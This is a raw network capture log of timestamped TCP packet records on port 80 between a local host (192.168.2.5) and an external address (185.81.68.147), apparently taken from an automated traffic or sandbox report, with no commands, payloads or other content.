                                                                                                                                                                Dec 13, 2024 01:37:12.238883018 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.238998890 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.239109993 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.239790916 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.239897966 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.239969969 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.240704060 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.240827084 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.240897894 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.241605043 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.241727114 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.241797924 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.242516994 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.242633104 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.242718935 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.243463039 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.243583918 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.243654966 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.244357109 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.244491100 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.244563103 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.245246887 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.245358944 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.245430946 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.246166945 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.246279955 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.246349096 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.247072935 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.247195005 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.247271061 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.247973919 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.248076916 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.248158932 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.248883009 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.249057055 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.249131918 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.249802113 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.249919891 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.249991894 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.250710011 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.250838041 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.250910044 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.251612902 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.251718998 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.251790047 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.252525091 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.252648115 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.252722979 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.253433943 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.253540039 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.253622055 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.254347086 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.254461050 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.254559040 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.255280972 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.255378962 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.256190062 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.256262064 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.256299019 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.256370068 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.257076025 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.257198095 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.257273912 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.257986069 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.258088112 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.258162022 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.258893967 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.259002924 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.259074926 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.259799957 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.259919882 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.259991884 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.260724068 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.260837078 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.260916948 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.261616945 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.261744022 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.261816025 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.262526989 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.262666941 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.262742043 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.263439894 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.263559103 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.263633013 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.264345884 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.264465094 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.264560938 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.265261889 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.265337944 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.265410900 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.266196012 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.266308069 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.266381979 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.267082930 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.267188072 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.267261028 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.267927885 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.317377090 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.412218094 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.412311077 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.412409067 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.412596941 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.412636042 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.412713051 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.413517952 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.413638115 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.413713932 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.414401054 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.414520025 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.414589882 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.415334940 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.415432930 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.415502071 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.416220903 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.416340113 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.416412115 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.417165041 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.417263985 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.417340040 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.418051004 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.418179989 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.418251038 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.418953896 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.419063091 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.419132948 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.419881105 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.419969082 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.420041084 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.420764923 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.420885086 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.420954943 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.421673059 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.421791077 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.421861887 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.422594070 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.422709942 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.422780991 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.423504114 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.423626900 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.423697948 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.424420118 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.424552917 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.424623966 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.425316095 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.425441027 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.425513983 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.426242113 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.426386118 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.426457882 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.427124977 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.427248955 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.427325964 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.428044081 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.428158045 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.428227901 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.428966999 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.429080009 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.429152012 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.429871082 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.429987907 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.430058002 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.430793047 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.430906057 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.430975914 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.431694031 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.431794882 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.431865931 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.432600975 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.432729959 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.432801962 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.433514118 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.433650970 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.433718920 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.434448004 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.434552908 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.434619904 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.435332060 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.435446024 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.435516119 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.436242104 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.436291933 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.436357021 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.437150002 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.437179089 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.437246084 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.438054085 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.438170910 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.438239098 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.438970089 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.439095020 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.439161062 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.439881086 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.439996004 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.440063953 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.440782070 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.440910101 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.440973997 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.441715956 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.441842079 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.441910028 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.442611933 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.442732096 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.442801952 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.443507910 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.443634033 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.443701982 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.444411039 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.444530010 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.444597960 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.445342064 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.445540905 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.445610046 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.446259975 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.446464062 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.446532011 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.447165012 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.447283983 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.447352886 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.448072910 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.448204041 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.448271990 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.448976994 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.449126005 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.449196100 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.449878931 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.449999094 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.450067997 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.450809956 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.450912952 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.450980902 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.451703072 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.451895952 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.451966047 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.452613115 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.452729940 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.452800989 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.453562021 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.453671932 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.453752995 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.454423904 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.454541922 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.454610109 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.455341101 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.455466032 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.455533028 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.456247091 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.456388950 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.456458092 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.457154989 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.457290888 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.457361937 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.458079100 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.458208084 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.458278894 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.458986044 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.459110022 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.459182024 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.459860086 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.504712105 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.604168892 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.604192972 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.604362011 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.604396105 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.604547977 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.604604959 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.604654074 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.605472088 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.605521917 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.605601072 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.606398106 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.606446028 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.606493950 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.607319117 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.607368946 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.607398987 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.608200073 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.608249903 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.608295918 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.609116077 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.609164953 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.609234095 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.610052109 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.610100985 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.610130072 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.610918045 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.610969067 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.611025095 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.611846924 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.611897945 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.611926079 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.612731934 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.612782001 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.612828970 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.613663912 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.613713026 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.613759041 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.614552975 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.614638090 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.614667892 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.615458012 CET8049707185.81.68.147192.168.2.5
